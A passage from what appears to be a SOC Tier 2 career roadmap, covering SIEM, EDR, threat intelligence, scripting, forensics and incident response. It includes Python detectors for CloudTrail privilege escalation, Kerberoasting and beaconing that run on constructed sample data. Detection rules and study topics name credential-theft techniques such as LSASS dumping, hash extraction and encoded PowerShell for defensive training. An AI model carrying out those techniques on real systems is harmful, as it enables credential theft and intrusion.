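trusted egress ranges, and IAM privilege-escalation chains (CreateUser ->
AttachUserPolicy AdministratorAccess -> CreateAccessKey). Added example for this
roadmap; the records are constructed."""
import ipaddress
from datetime import datetime, timedelta

PRIVILEGED_POLICIES = ("AdministratorAccess", "IAMFullAccess")
FOLLOW_UP_EVENTS = ("AttachUserPolicy", "PutUserPolicy", "AddUserToGroup", "CreateAccessKey", "CreateLoginProfile")


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def principal(record):
    """Human-readable caller: root, IAM user name, or the ARN for roles/services."""
    ui = record["userIdentity"]
    if ui["type"] == "Root":
        return "root"
    return ui.get("userName") or ui.get("arn")


def root_usage(records):
    """Root should be locked away; any interactive or API use is a finding."""
    return [(r["eventTime"], r["eventName"], r["sourceIPAddress"])
            for r in records if r["userIdentity"]["type"] == "Root"]


def unusual_source_ips(records, trusted_cidrs):
    """API calls whose caller IP is outside the trusted ranges, grouped by IP.
    AWS service principals log a DNS name (e.g. autoscaling.amazonaws.com) and are skipped."""
    nets = [ipaddress.ip_network(c) for c in trusted_cidrs]
    hits = {}
    for r in records:
        src = r["sourceIPAddress"]
        try:
            ip = ipaddress.ip_address(src)
        except ValueError:
            continue
        if not any(ip in n for n in nets):
            hits.setdefault(src, []).append(r["eventName"])
    return hits


def iam_privesc_chains(records, window_minutes=60):
    """CreateUser followed, within the window and for the same new user, by a
    privileged policy attachment; any later credential creation is listed too."""
    recs = sorted(records, key=lambda r: r["eventTime"])
    chains = []
    for r in recs:
        if r["eventName"] != "CreateUser":
            continue
        new_user = r["requestParameters"]["userName"]
        start = parse_time(r["eventTime"])
        follow = [x for x in recs
                  if x["eventName"] in FOLLOW_UP_EVENTS
                  and x.get("requestParameters", {}).get("userName") == new_user
                  and start <= parse_time(x["eventTime"]) <= start + timedelta(minutes=window_minutes)]
        admin = [x for x in follow if x["eventName"] == "AttachUserPolicy"
                 and any(p in x["requestParameters"].get("policyArn", "") for p in PRIVILEGED_POLICIES)]
        if admin:
            chains.append({"actor": principal(r), "new_user": new_user, "source_ip": r["sourceIPAddress"],
                           "steps": [r["eventName"]] + [x["eventName"] for x in follow]})
    return chains


def _rec(time, source, name, identity, ip, params=None):
    return {"eventVersion": "1.08", "eventTime": time, "eventSource": source, "eventName": name,
            "awsRegion": "us-east-1", "userIdentity": identity, "sourceIPAddress": ip,
            "requestParameters": params or {}}


_ROOT = {"type": "Root", "arn": "arn:aws:iam::123456789012:root", "accountId": "123456789012"}
_CI = {"type": "IAMUser", "userName": "ci-deployer", "arn": "arn:aws:iam::123456789012:user/ci-deployer"}
_ALICE = {"type": "IAMUser", "userName": "alice", "arn": "arn:aws:iam::123456789012:user/alice"}

# Constructed records, in time order.
SAMPLE_RECORDS = [
    _rec("2024-03-04T09:40:12Z", "signin.amazonaws.com", "ConsoleLogin", _ROOT, "198.51.100.23"),
    _rec("2024-03-04T10:02:40Z", "iam.amazonaws.com", "CreateUser", _CI, "198.51.100.23", {"userName": "backup-svc"}),
    _rec("2024-03-04T10:03:15Z", "iam.amazonaws.com", "AttachUserPolicy", _CI, "198.51.100.23",
         {"userName": "backup-svc", "policyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}),
    _rec("2024-03-04T10:03:50Z", "iam.amazonaws.com", "CreateAccessKey", _CI, "198.51.100.23", {"userName": "backup-svc"}),
    _rec("2024-03-04T10:10:00Z", "ec2.amazonaws.com", "RunInstances", _ALICE, "203.0.113.5", {"instanceType": "t3.micro"}),
    _rec("2024-03-04T10:11:00Z", "ec2.amazonaws.com", "DescribeInstances",
         {"type": "AWSService", "invokedBy": "autoscaling.amazonaws.com"}, "autoscaling.amazonaws.com"),
]
TRUSTED_EGRESS = ["203.0.113.0/24"]  # assumption: the organization's known egress range

if __name__ == "__main__":
    print(root_usage(SAMPLE_RECORDS))
    print(unusual_source_ips(SAMPLE_RECORDS, TRUSTED_EGRESS))
    print(iam_privesc_chains(SAMPLE_RECORDS))
```

The three checks are deliberately independent so each can run over a day of CloudTrail on its own; in the sample they converge on the same external IP, which is the correlation a T2 analyst would write up.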
Resources
- TryHackMe Log Analysis rooms (free)
- HTB Academy Windows Event Logs & Finding Evil module
- HTB Academy Working with IDS/IPS module
- LetsDefend SOC path (free tier)
- CyberDefenders labs
- SANS Reading Room (free whitepapers)
Stage 06
SIEM Operations — Advanced
T2 analysts go beyond alert triage, writing detection rules, tuning correlation logic, and building hunts inside the SIEM.
SIEM Fundamentals — Deep
- All T1 SIEM fundamentals (ingestion, normalization, correlation, alerting)
- Data model depth — CIM field mapping, custom sourcetype parsing
- Retention architecture — hot/warm/cold data tiers, search performance implications
- SIEM as investigation platform — not just alerting but forensic timeline reconstruction
Splunk — Advanced
- All T1 SPL skills plus: subsearch — nested searches for complex correlations; append, appendcols, join — combining result sets; streamstats — running calculations within a time window; eventstats — aggregate without losing individual events; cluster — grouping similar log messages for noise reduction; anomalydetection — statistical outlier identification; tstats — accelerated search over datamodels for large-scale queries; makeresults + eval — building test datasets for rule validation; inputlookup / outputlookup — IOC enrichment from threat intel lists; map — looping searches (use sparingly)
- Writing detection content in Splunk: Brute force with success: failed logon threshold followed by successful logon from same source; Kerberoasting: high volume EID 4769 with RC4 encryption type from single source; LSASS access: Sysmon EID 10 where TargetImage contains lsass.exe; Encoded PowerShell: EID 4688 where CommandLine contains "-enc" or "-EncodedCommand"; Scheduled task creation: EID 4698 outside business hours; New local admin account: EID 4720 followed by EID 4732 adding to Administrators group; Impossible travel: successful logon from two geolocations within impossible time window; Large data transfer: bytes_out threshold per destination per user per hour
- Alert tuning — reducing false positive rate, whitelisting known-good, throttling noisy rules
- Splunk Enterprise Security (ES) — risk-based alerting, risk score framework, notable events, asset and identity framework
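The Kerberoasting detection listed above and the Kerberos event IDs under Active Directory Logs in Stage 05 share one set of logic, so a single added example covers both (it is not part of the roadmap and not Splunk content). It groups successful 4769s with RC4 tickets by requesting account and client IP and flags many distinct SPNs in a short window, lists 4768 requests for accounts with pre-authentication disabled (the AS-REP Roasting targets), and counts 4771 pre-auth failures per source as a Kerberos password spray. The events are constructed with the Security log's EventData field names.

```python
"""Kerberos detections over domain-controller Security events: Kerberoasting
(many distinct RC4 service tickets, 4769), AS-REP roastable accounts (4768 with
pre-auth type 0) and Kerberos password spraying (4771 status 0x18 across many
accounts from one IP). Added example for this roadmap; the events are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"
KRB_PREAUTH_FAILED = "0x18"


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def client_ip(event):
    """The Security log writes IPv4 clients as ::ffff:a.b.c.d."""
    return event.get("IpAddress", "").replace("::ffff:", "")


def detect_kerberoasting(events, min_spns=5, window_minutes=10):
    """Group successful 4769s with RC4 tickets by requesting account and IP;
    computer accounts (name ending in $) and krbtgt are excluded since they are
    not roastable targets."""
    groups = defaultdict(list)
    for e in events:
        if e["EventID"] != 4769 or e.get("Status") != "0x0" or e.get("TicketEncryptionType") != RC4_HMAC:
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        groups[(e["TargetUserName"], client_ip(e))].append(e)
    findings = []
    for (account, ip), evs in groups.items():
        times = sorted(parse_time(e["TimeCreated"]) for e in evs)
        spns = sorted({e["ServiceName"] for e in evs})
        span = times[-1] - times[0]
        if len(spns) >= min_spns and span <= timedelta(minutes=window_minutes):
            findings.append({"account": account, "ip": ip, "spns": spns, "span_seconds": int(span.total_seconds())})
    return findings


def asrep_roastable_requests(events):
    """4768 with PreAuthType 0 means the account does not require pre-authentication;
    an RC4-encrypted reply is directly crackable offline."""
    return [{"account": e["TargetUserName"], "ip": client_ip(e), "rc4": e.get("TicketEncryptionType") == RC4_HMAC}
            for e in events if e["EventID"] == 4768 and e.get("PreAuthType") == "0"]


def detect_kerberos_spray(events, min_users=5):
    """4771 with status 0x18 (pre-auth failed) across many distinct accounts from
    one source is a password spray over Kerberos; it never produces a 4625."""
    users_by_ip = defaultdict(set)
    for e in events:
        if e["EventID"] == 4771 and e.get("Status") == KRB_PREAUTH_FAILED:
            users_by_ip[client_ip(e)].add(e["TargetUserName"])
    return [{"ip": ip, "users": sorted(u)} for ip, u in users_by_ip.items() if len(u) >= min_users]


def _ev(eid, t, user, ip, **extra):
    return dict({"EventID": eid, "TimeCreated": t, "TargetUserName": user, "IpAddress": "::ffff:" + ip}, **extra)


# Constructed DC events: jsmith pulls six RC4 service tickets in 50 seconds, alice
# makes two AES requests, svc_legacy has pre-auth disabled, 10.0.9.9 sprays 4771s.
SAMPLE_EVENTS = (
    [_ev(4769, f"2024-03-04T10:00:{i * 10:02d}Z", "jsmith@CORP.LOCAL", "10.0.5.23",
         ServiceName=svc, TicketEncryptionType=RC4_HMAC, Status="0x0")
     for i, svc in enumerate(["svc_sql", "svc_web", "svc_backup", "svc_sccm", "svc_ftp", "svc_report"])]
    + [_ev(4769, "2024-03-04T10:05:00Z", "alice@CORP.LOCAL", "10.0.5.40",
           ServiceName="svc_sql", TicketEncryptionType="0x12", Status="0x0"),
       _ev(4769, "2024-03-04T10:05:01Z", "alice@CORP.LOCAL", "10.0.5.40",
           ServiceName="FS01$", TicketEncryptionType="0x12", Status="0x0"),
       _ev(4768, "2024-03-04T10:06:00Z", "svc_legacy@CORP.LOCAL", "10.0.5.23",
           ServiceName="krbtgt", TicketEncryptionType=RC4_HMAC, PreAuthType="0", Status="0x0"),
       _ev(4768, "2024-03-04T10:06:10Z", "alice@CORP.LOCAL", "10.0.5.40",
           ServiceName="krbtgt", TicketEncryptionType="0x12", PreAuthType="2", Status="0x0")]
    + [_ev(4771, f"2024-03-04T10:07:{i:02d}Z", f"user{i}@CORP.LOCAL", "10.0.9.9",
           Status=KRB_PREAUTH_FAILED, PreAuthType="2")
       for i in range(6)]
)

if __name__ == "__main__":
    print(detect_kerberoasting(SAMPLE_EVENTS))
    print(asrep_roastable_requests(SAMPLE_EVENTS))
    print(detect_kerberos_spray(SAMPLE_EVENTS))
```

The same grouping keys (account, client IP, distinct ServiceName, encryption type 0x17) are what the SPL or KQL version of the Kerberoasting rule counts; having the logic in a script makes it easy to replay exported events when tuning the SPN threshold for an environment with many legitimate RC4-only services.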
Microsoft Sentinel — Advanced
- All T1 KQL plus: mv-expand — expanding dynamic arrays; parse_json / parse_csv — structured data extraction; bag_unpack — flattening dynamic columns; ipv4_is_private() — filtering internal traffic; geo_info_from_ip_address() — geolocation enrichment; Anomaly detection functions — series_decompose_anomalies()
- Writing analytic rules: Scheduled query rules — custom KQL with entity mapping; Near-real-time (NRT) rules — low-latency detection; Fusion rules — ML-based multi-stage attack correlation
- Hunting queries — proactive investigation without alert trigger
- Watchlists — IOC lists, VIP user lists, high-value asset lists for enrichment
- Entity pages — user, host, IP timelines for investigation pivoting
- Notebooks (Jupyter) — advanced investigation and hunting with Python
Detection Engineering Foundations
- Sigma rules — vendor-neutral detection rule format, YAML syntax, field mappings
- Converting Sigma to Splunk SPL, KQL, QRadar AQL with sigma-cli and pySigma backends (the original sigmac converter is deprecated)
- YARA rules — file and memory pattern matching for malware detection: Rule structure — meta, strings (text, hex, regex), condition; Writing rules for common malware artifacts; Using YARA with VirusTotal, ClamAV, LOKI scanner
- Detection coverage mapping — using ATT&CK Navigator to identify gaps
- Alert lifecycle — creation → testing → tuning → promotion → retirement
Resources
- Splunk free training (splunk.com)
- Boss of the SOC (BOTS) dataset (free)
- TryHackMe Splunk Advanced rooms
- HTB Academy Intro to Splunk module
- Sigma GitHub repository (free)
- YARA documentation (free)
- TryHackMe Microsoft Sentinel room
Stage 07
Endpoint Detection & Response — Advanced
T2 analysts conduct deep endpoint forensics using EDR telemetry, not just alert review.
EDR — Deep Investigation
- All T1 EDR fundamentals (CrowdStrike, MDE, SentinelOne) plus:
- Process injection techniques and EDR detection: DLL injection — LoadLibrary, remote thread creation; Process hollowing — unmapping legitimate executable, loading malicious code; Process doppelgänging — NTFS transaction abuse; Reflective DLL injection — loading from memory without disk artifact; Thread hijacking — hijacking existing thread context
- LSASS memory access patterns — Mimikatz signatures, comsvcs.dll minidump, custom credential dumping tools
- Token impersonation — SeImpersonatePrivilege, Potato exploits, token theft
- Living-off-the-Land (LotL) — wmic.exe, certutil.exe, regsvr32.exe, mshta.exe, rundll32.exe abuse patterns
CrowdStrike Falcon — Advanced
- Falcon Fusion — SOAR workflow automation, trigger conditions, actions
- Custom IOA (Indicator of Attack) rules — behavioral detection beyond signatures
- Threat Graph — relationship hunting across process, file, network and host telemetry
- RTR scripting — custom scripts for mass host investigation
- Event Search / Investigate — raw telemetry hunting with event_simpleName field
- Hunting queries: lsass access, scheduled task via schtasks.exe, certutil download, encoded PowerShell
Microsoft Defender for Endpoint — Advanced
- Advanced Hunting — complex multi-table queries: Joining DeviceProcessEvents + DeviceNetworkEvents on DeviceId and Timestamp; Joining DeviceLogonEvents + DeviceFileEvents for credential-followed-by-staging chains; IdentityLogonEvents — Azure AD sign-in correlation with endpoint activity; EmailEvents — phishing email correlation with endpoint execution
- Custom detection rules — KQL queries scheduled as persistent detections
- Vulnerability management integration — correlating exposed CVEs with alert activity
- Secure Score — understanding the posture metrics T2 analysts are expected to improve
Endpoint Forensics Without EDR
- For environments without EDR or for forensic depth beyond EDR:
- Autoruns (Sysinternals) — comprehensive persistence mechanism enumeration
- Process Explorer (Sysinternals) — detailed process tree, DLL inspection, VirusTotal integration
- TCPView (Sysinternals) — live network connections per process
- ProcMon (Sysinternals) — real-time process, file, registry monitoring
- Volatility 3 — memory forensics framework (overview at this stage, deep dive in Stage 10)
- FTK Imager — disk image acquisition, triage collection
- KAPE (Kroll Artifact Parser and Extractor) — rapid forensic artifact collection
Resources
- CrowdStrike free training portal (free)
- Microsoft Learn MDE Advanced Hunting (free)
- TryHackMe EDR rooms
- HTB Academy Incident Handling with Splunk
- Sysinternals Suite documentation (free)
- Volatility Foundation documentation (free)
Stage 08
Threat Intelligence — Operational
T2 analysts consume and apply threat intelligence operationally — enriching investigations, hunting by TTP, and integrating intel into detection content.
MITRE ATT&CK — Operational Depth
- All T1 ATT&CK knowledge plus:
- ATT&CK for ICS — industrial control system technique matrix
- ATT&CK for Mobile — iOS and Android technique matrix
- Sub-technique depth — know the specific implementations, not just technique IDs
- Threat group profiles in depth — APT28, APT29, Lazarus Group, FIN7, FIN11, Lapsus$, BlackCat/ALPHV — TTPs, tools, infrastructure patterns, targets
- ATT&CK data sources — mapping detections to data source requirements
- D3FEND — MITRE defensive countermeasure framework, pairing with ATT&CK
- ATT&CK Navigator — building coverage heatmaps, threat group overlays, gap analysis
Threat Intelligence Standards
- STIX 2.1 — Structured Threat Information eXpression: Object types — Indicator, Malware, Threat Actor, Campaign, Course of Action, Attack Pattern, Relationship; Indicator pattern language — [file:hashes.MD5 = 'abc123']; Bundle structure — packaging multiple STIX objects
- TAXII 2.1 — Trusted Automated eXchange of Intelligence Information: API roots, collections, pushing/pulling bundles; How MISP and OpenCTI implement TAXII for feed sharing
- TLP (Traffic Light Protocol) 2.0 — CLEAR (formerly WHITE), GREEN, AMBER, AMBER+STRICT, RED — sharing restrictions
- TLP 2.0 changes (2022) — WHITE renamed to CLEAR, AMBER+STRICT added to restrict sharing to the recipient organization only
Threat Intelligence Platforms
- MISP — event structure, attributes, objects, galaxies (ATT&CK, threat actors, ransomware), tags, sharing groups, feeds: Ingesting external feeds — CIRCL, abuse.ch, AlienVault OTX; Creating events from incident IOCs; Exporting to SIEM — MISP → Splunk lookup, Sentinel watchlist; PyMISP — Python API for automation
- OpenCTI — entity relationships, campaign tracking, threat actor attribution graphs: STIX 2.1 native — richer relationship modeling than MISP; Connectors — MITRE ATT&CK, abuse.ch, Shodan, VirusTotal; Investigation dashboard — pivoting across entities
- Recorded Future / Anomali / Intel 471 — commercial platform awareness
IOC Enrichment — Advanced
- All T1 enrichment tools (VirusTotal, AbuseIPDB, Shodan, URLScan, MalwareBazaar, URLhaus, ThreatFox, OTX, WHOIS, GreyNoise, Any.run) plus:
- Passive DNS pivoting — SecurityTrails, DNSDB, RiskIQ PassiveTotal — historical infrastructure mapping
- Certificate transparency logs — crt.sh — finding attacker infrastructure from TLS certs
- Favicon hashing — Shodan favicon search for C2 infrastructure reuse
- ASN pivoting — finding related attacker infrastructure in same autonomous system
- Maltego — visual link analysis, transforms for automated pivoting across data sources
- SpiderFoot — automated OSINT reconnaissance and IOC expansion
Hypothesis-Driven Threat Hunting
- What threat hunting is — proactive search without an existing alert trigger
- The hunting process: 1. Hypothesis formation — "Do we have Kerberoasting activity that bypassed detection?"; 2. Data identification — what logs/sources would show this; 3. Query execution — SIEM/EDR search across historical data; 4. Analysis — distinguishing normal from anomalous results; 5. Documentation — findings, new detections created, negative hunts recorded
- Hunt hypothesis sources — ATT&CK threat group reports, vendor threat intelligence, recent CVEs, peer organization breaches
- Common hunt hypotheses for T2: Lateral movement via legitimate credentials (no malware alert triggered); Data staging before exfiltration (large compressed archives in unusual locations); Living-off-the-land execution (LOLBin usage without corresponding user activity); Dormant implants with low-frequency beaconing; Kerberoasting / AS-REP Roasting without endpoint alert; Credential access via LSASS access with non-standard tools
- Documenting hunts — hunt log format, negative results are still value
Resources
- MITRE ATT&CK website (attack.mitre.org, free)
- ATT&CK Navigator (free)
- MISP (misp-project.org, free)
- OpenCTI (github.com/OpenCTI-Platform, free)
- TryHackMe Threat Intelligence rooms
- HTB Academy Threat Hunting module
- AttackIQ Academy (free)
Stage 09
Scripting & Automation
Python and PowerShell are non-negotiable at T2. Scripting separates efficient investigators from those who manually click through every case.
Python for Security
- Fundamentals — variables, data types, conditionals, loops, functions, error handling
- File I/O — reading and writing text files, CSV, JSON
- String manipulation — regex (re module), parsing log lines
- Requests library — HTTP API calls, authentication headers, pagination
- JSON handling — parsing API responses from VirusTotal, Shodan, MISP
- subprocess — calling system commands from Python scripts
- Collections — Counter, defaultdict for log analysis aggregation
- datetime — timestamp parsing, timezone normalization
- Practical scripts to build: IOC bulk enrichment — read list of IPs/hashes, query VirusTotal API, output enriched CSV; Log parser — parse Windows event log CSV exports, filter by EventID, output timeline; MISP event creator — take incident IOCs, create MISP event via PyMISP; Splunk alert enricher — query Splunk API, enrich alert with context, post to TheHive; Beacon detector — parse proxy logs, calculate request intervals, flag regular beacons
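The beacon detector in the practical scripts above is the same analysis the Rita item in Stage 04 and the proxy-log beaconing item in Stage 05 describe, so one added example serves all three (it is not part of the roadmap and not Rita's code). It groups proxy requests by client and destination host, computes the median interval and the median absolute deviation (MAD) of the intervals, and treats a low MAD/median ratio over enough requests as machine-regular traffic. The proxy lines are constructed in a simplified space-delimited format, an assumption a real deployment would replace with its proxy's own schema.

```python
"""Beacon detector: group proxy requests by (client, destination host), measure
interval regularity with median/MAD, and score candidates RITA-style. Added
example for this roadmap; the proxy lines are constructed."""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit


def parse_proxy_line(line):
    """Constructed format: '<iso-ts> <client> <method> <url> <status> <bytes> <user-agent...>'."""
    ts, client, method, url, status, size, agent = line.split(" ", 6)
    return {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "client": client, "method": method,
            "host": urlsplit(url).hostname, "url": url, "status": int(status), "bytes": int(size), "agent": agent}


def beacon_stats(requests, min_requests=10, max_jitter_ratio=0.1):
    """Per (client, host): interval median, MAD and MAD/median (jitter ratio).
    Low ratio with enough samples = machine-regular traffic; the score is
    1 - jitter ratio, scaled down when the count is below min_requests."""
    groups = defaultdict(list)
    for r in requests:
        groups[(r["client"], r["host"])].append(r)
    report = {}
    for key, reqs in groups.items():
        times = sorted(r["ts"] for r in reqs)
        if len(times) < 2:
            continue
        intervals = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        median = statistics.median(intervals)
        mad = statistics.median(abs(i - median) for i in intervals)
        jitter_ratio = mad / median if median else float("inf")
        sizes = [r["bytes"] for r in reqs]
        report[key] = {
            "requests": len(reqs),
            "median_interval": median,
            "mad": mad,
            "jitter_ratio": round(jitter_ratio, 3),
            "size_spread": max(sizes) - min(sizes),
            "user_agents": len({r["agent"] for r in reqs}),
            "score": round(max(0.0, 1 - jitter_ratio) * min(1.0, len(reqs) / min_requests), 3),
            "beacon": len(reqs) >= min_requests and jitter_ratio <= max_jitter_ratio,
        }
    return report


def _lines(client, host, offsets, size, agent, path="/"):
    base = datetime(2024, 3, 4, 10, 0, 0)
    return [f"{(base + timedelta(seconds=o)).strftime('%Y-%m-%dT%H:%M:%SZ')} {client} GET http://{host}{path} 200 {size} {agent}"
            for o in offsets]


# Constructed proxy excerpt: one host checks in roughly every 60 s with small,
# identical replies; another host browses a site at human-irregular intervals.
SAMPLE_PROXY_LOG = (
    _lines("10.0.5.23", "cdn-update.example.net", [0, 61, 119, 182, 240, 302, 358, 420, 481, 539, 601, 660], 512,
           "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "/api/ping")
    + _lines("10.0.5.40", "news.example.org", [0, 5, 7, 40, 300, 301, 900, 1500, 1503, 2400], 48000,
             "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0")
)

if __name__ == "__main__":
    for key, m in beacon_stats(parse_proxy_line(l) for l in SAMPLE_PROXY_LOG).items():
        print(key, m)
```

Median and MAD are used instead of mean and standard deviation because a single long gap (a laptop closed for lunch) would otherwise wash out an otherwise perfectly regular beacon; size_spread and user_agents are reported as supporting signals, since implants tend to send fixed-size check-ins with one user agent.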
PowerShell for Security
- Fundamentals — cmdlets, pipelines, variables, loops, functions, error handling
- Active Directory module — Get-ADUser, Get-ADGroup, Get-ADComputer, Get-ADGroupMember
- Event log querying — Get-WinEvent with FilterHashtable, -FilterXPath
- Remote execution — Invoke-Command, Enter-PSSession, WinRM
- File system investigation — Get-ChildItem, Get-FileHash, Get-Item -Stream (ADS)
- Registry investigation — Get-ItemProperty for Run keys and persistence locations
- Network investigation — Get-NetTCPConnection, Resolve-DnsName, Test-NetConnection
- Scheduled tasks — Get-ScheduledTask, Export-ScheduledTask XML
- Practical scripts: Enumerate all local admin accounts across domain; Find processes with LSASS handles; Extract recently created scheduled tasks with XML detail; Get all users logged into a remote host; Hash all executables in suspicious directory and check against known-good baseline
Bash for Security
- Pipeline mastery — grep, awk, sed, cut, sort, uniq, wc, tr, xargs combinations
- Log parsing one-liners — extract, filter, count, deduplicate log data at command line
- find + xargs combinations — bulk file operations
- Scripting — loops, conditionals, functions, argument handling
- Practical scripts: Parse auth.log for brute force — count failed logins by IP, threshold alert; Extract unique IPs from web server logs, query AbuseIPDB API in loop; Monitor a directory for new files, hash and log them
SOAR Integration
- What SOAR does — orchestration, automation, playbook execution
- Splunk SOAR (Phantom) — apps, actions, playbooks, visual playbook editor
- Palo Alto Cortex XSOAR — incident layout, automation scripts, integrations
- TheHive + Cortex — open-source case management + automated responder actions
- Building a simple playbook: Trigger: new SIEM alert; Action 1: enrich source IP via VirusTotal; Action 2: enrich destination domain via URLScan; Action 3: if malicious score > threshold, create TheHive case with enrichment; Action 4: post notification to Slack/Teams channel
Resources
- Python for Everybody (Coursera, free)
- Automate the Boring Stuff with Python (automatetheboringstuff.com, free)
- TryHackMe Python basics rooms
- SS64 PowerShell reference (free)
- HTB Academy Scripting for Security module
- TryHackMe SOAR rooms
Stage 10
Digital Forensics Fundamentals
T2 analysts are expected to collect and analyze forensic evidence. This is what separates an investigator from a ticket-closer.
Forensics Principles
- Order of volatility (RFC 3227) — CPU registers and cache → RAM (running processes, network connections, kernel state) → swap/page file and temporary files → disk → remote logs and monitoring data → physical configuration and network topology → archival and removable media
- Evidence preservation — write blockers, chain of custody, hashing before and after acquisition (MD5, SHA-256)
- Forensic imaging — bit-for-bit copy vs logical copy — when each is appropriate
- What not to do — do not run antivirus, do not reboot, do not write to the suspect drive
Memory Forensics
- Why memory matters — passwords, encryption keys, injected code, network connections, running processes — all visible in RAM
- Acquisition tools — WinPMEM, DumpIt, Magnet RAM Capture, FTK Imager memory acquisition
- Volatility 3 — framework for memory analysis: windows.pslist — running process list; windows.pstree — process tree showing parent/child; windows.cmdline — command line arguments per process; windows.netscan — network connections at time of acquisition; windows.dlllist — DLLs loaded per process; windows.malfind — memory regions with executable code not backed by file (injection detection); windows.hashdump — extract NTLM hashes from memory; windows.dumpfiles — extract file objects from memory; linux.bash — recover bash history from memory
Disk Forensics
- FTK Imager — creating forensic images (E01, raw/dd), verifying integrity, browsing without mounting
- Autopsy — open-source forensic platform: Adding data sources — disk images, logical files; File system analysis — directory tree, deleted files, timeline; Keyword search — searching for IOCs in disk content; Hash database — matching against known-malicious hashes; Web artifacts — browser history, downloads, cache; Registry analysis — viewing hive files directly
- KAPE (Kroll Artifact Parser and Extractor) — rapid triage collection: Targets — what to collect (event logs, prefetch, shimcache, amcache, NTUSER.dat, browser artifacts, MFT); Modules — what to parse after collection
- MFT analysis — MFTECmd to parse Master File Table — creation/access/modification timestamps, deleted file evidence
- Prefetch analysis — PECmd — execution evidence, linked files, run count, last run timestamps
- Shimcache analysis — AppCompatCacheParser — execution evidence even without Sysmon
- Amcache analysis — AmcacheParser — program execution with SHA1 hashes
Browser Forensics
- Browser artifact locations — Chrome, Firefox, Edge profiles
- History, downloads, cookies, cache, form data
- Browser extensions — malicious extension persistence
Email Forensics
- Email header analysis — Received chain, SPF/DKIM/DMARC results, X-Originating-IP
- Phishing analysis workflow — extract URLs, hash attachments, detonate in sandbox
- .eml and .msg file parsing — structure, embedded objects, MIME encoding
Resources
- TryHackMe Windows Forensics 1/2 rooms (free)
- TryHackMe Linux Forensics room (free)
- HTB Academy Introduction to Digital Forensics module
- Volatility 3 documentation (free)
- Autopsy documentation (free)
- KAPE documentation (free)
- 13Cubed YouTube channel (Windows forensics, free)
Stage 11
Incident Response — Lead
T2 analysts do not just follow playbooks. They lead investigations, make scope decisions, and own the case from detection to closure.
IR Leadership at T2
- Owning escalated incidents — taking full case ownership from T1 handoff
- Scope determination — systematic methodology for identifying all affected systems
- Impact assessment — data classification, business impact, regulatory notification triggers (GDPR 72-hour, HIPAA breach notification)
- Evidence-based decision making — containment timing based on investigative completeness vs business continuity
- Cross-team coordination — working with IT, Legal, HR, PR, executive stakeholders
- Chain of custody — maintaining defensible evidence for legal proceedings
Active Incident Investigation
- Building a unified timeline — correlating SIEM, EDR, network, cloud, and application logs
- Attacker TTPs mapping — charting the full kill chain from initial access to actions on objectives
- Lateral movement reconstruction — mapping attacker path through the environment
- Credential exposure assessment — which accounts were compromised, what they had access to
- Data exposure assessment — what data was accessed, staged, or exfiltrated
- C2 infrastructure documentation — all IPs, domains, protocols used
Common T2 Incident Types
- Business Email Compromise (BEC) — email header analysis, mailbox rule investigation, OAuth token abuse
- Ransomware response — patient zero identification, encryption timeline, backup integrity validation, ransom decision support
- Supply chain compromise — third-party software update as attack vector, IOC extraction from vendor advisory
- Insider threat — user behavior analysis, DLP alert correlation, access pattern investigation
- Cloud account compromise — IAM event analysis, resource creation review, data access audit
- Advanced persistent threat (APT) — multi-stage investigation, long dwell time, multiple lateral movement hops
Post-Incident
- Root cause analysis — the actual initial access vector, not just "malware was found"
- Lessons learned facilitation — structured review with detection gaps identified
- Detection improvements — new SIEM rules, EDR policies, network blocks from incident IOCs
- Executive briefing — one-page summary: what happened, impact, response, what changed
- Incident metrics — MTTD, MTTR, dwell time, recurrence tracking
Resources
- NIST SP 800-61 Rev 2 (free, official)
- SANS IR papers (free, sans.org/white-papers)
- LetsDefend SOC incident simulations
- CyberDefenders incident response labs
- HTB Academy Incident Handling with Splunk
FAQ
Common questions
How long does it take to become a SOC Analyst — Tier 2?
18 months optimistic at 20–25 hours/week from zero, 2–3 years realistic. The most common path is SOC T1 → SOC T2 with 12–18 months at T1. T2 demands deeper investigation skills, scripting fluency, threat hunting instincts, and the ability to determine scope and impact independently. T2 roles are fewer than T1 but higher value — analysts who add scripting, detection engineering, and hunting skills command significantly higher compensation and face less competition.
Which certifications matter for SOC T2 roles?
GCIH (GIAC Certified Incident Handler) for IR-overlapping T2 work. CySA+ for analytical depth. GCDA (GIAC Certified Detection Analyst) for detection engineering specialization. SANS-track certs are expensive but the content is the gold standard for T2 progression. Splunk Power User or Enterprise Certified Admin signal SIEM platform depth.
Do I need a CS degree?
No. T2 is meritocratic — demonstrated investigation skills and threat hunting writeups outweigh credentials. Self-taught analysts with strong CTF DFIR challenge solutions and lab investigation portfolios compete effectively. What you do need: scripting (Python at minimum), SIEM platform depth, threat intelligence consumption fluency, and at least basic memory analysis (Volatility) experience.
What separates a hired SOC T2?
Documented threat hunting writeups. Detection rules you've authored, threat hunts you've executed (even in lab environments), and investigation narratives that demonstrate analytical reasoning. Generic 'I know KQL' candidates lose to candidates with portfolio investigation work. Detection Engineering is the fastest-growing exit path from the T2 track.